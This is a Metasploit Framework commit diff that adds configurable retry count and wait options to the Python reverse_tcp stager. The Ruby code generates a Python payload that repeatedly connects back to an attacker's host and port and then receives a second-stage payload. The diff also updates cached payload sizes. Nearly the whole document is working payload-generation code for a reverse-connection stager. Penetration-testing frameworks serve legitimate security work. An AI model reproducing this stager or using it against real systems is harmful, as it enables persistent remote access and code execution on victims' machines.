Land rapid7#8275, add retry opts for py rev_tcp stager

zeroSteiner · zeroSteiner · commit 4e29b6e5fd4b · 2017-05-28T13:02:35.000-04:00
diff --git a/lib/msf/core/payload/python/reverse_tcp.rb b/lib/msf/core/payload/python/reverse_tcp.rb
@@ -16,14 +16,23 @@ module Payload::Python::ReverseTcp
   include Msf::Payload::Python
   include Msf::Payload::Python::SendUUID
 
+  def initialize(*args)
+    super
+    register_advanced_options([
+        OptInt.new('StagerRetryCount', [false, 'The number of times the stager should retry if the first connect fails (zero to infinite retries)', 10]),
+        OptInt.new('StagerRetryWait', [false, 'Number of seconds to wait for the stager between reconnect attempts', 5])
+      ], self.class)
+  end
+
   #
   # Generate the first stage
   #
   def generate
     conf = {
       port:        datastore['LPORT'],
       host:        datastore['LHOST'],
-      retry_count: datastore['ReverseConnectRetries'],
+      retry_count: datastore['StagerRetryCount'],
+      retry_wait:  datastore['StagerRetryWait'],
     }
 
     generate_reverse_tcp(conf)
@@ -43,9 +52,27 @@ def transport_config(opts={})
 
   def generate_reverse_tcp(opts={})
     # Set up the socket
-    cmd  = "import socket,struct\n"
-    cmd << "s=socket.socket(2,socket.SOCK_STREAM)\n" # socket.AF_INET = 2
-    cmd << "s.connect(('#{opts[:host]}',#{opts[:port]}))\n"
+    cmd  = "import socket,struct#{opts[:retry_wait].to_i > 0 ? ',time' : ''}\n"
+    if opts[:retry_wait].blank? # do not retry at all (old style)
+      cmd << "s=socket.socket(2,socket.SOCK_STREAM)\n" # socket.AF_INET = 2
+      cmd << "s.connect(('#{opts[:host]}',#{opts[:port]}))\n"
+    else
+      if opts[:retry_count] > 0
+        cmd << "for x in range(#{opts[:retry_count].to_i}):\n"
+      else
+        cmd << "while 1:\n"
+      end
+      cmd << "\ttry:\n"
+      cmd << "\t\ts=socket.socket(2,socket.SOCK_STREAM)\n" # socket.AF_INET = 2
+      cmd << "\t\ts.connect(('#{opts[:host]}',#{opts[:port]}))\n"
+      cmd << "\t\tbreak\n"
+      cmd << "\texcept:\n"
+      if opts[:retry_wait].to_i <= 0
+        cmd << "\t\tpass\n" # retry immediately
+      else
+        cmd << "\t\ttime.sleep(#{opts[:retry_wait]})\n" # retry after waiting
+      end
+    end
     cmd << py_send_uuid if include_send_uuid
     cmd << "l=struct.unpack('>I',s.recv(4))[0]\n"
     cmd << "d=s.recv(l)\n"
diff --git a/modules/payloads/stagers/python/reverse_tcp.rb b/modules/payloads/stagers/python/reverse_tcp.rb
@@ -10,7 +10,7 @@
 
 module MetasploitModule
 
-  CachedSize = 362
+  CachedSize = 454
 
   include Msf::Payload::Stager
   include Msf::Payload::Python::ReverseTcp
diff --git a/modules/payloads/stagers/python/reverse_tcp_uuid.rb b/modules/payloads/stagers/python/reverse_tcp_uuid.rb
@@ -10,7 +10,7 @@
 
 module MetasploitModule
 
-  CachedSize = 466
+  CachedSize = 558
 
   include Msf::Payload::Stager
   include Msf::Payload::Python
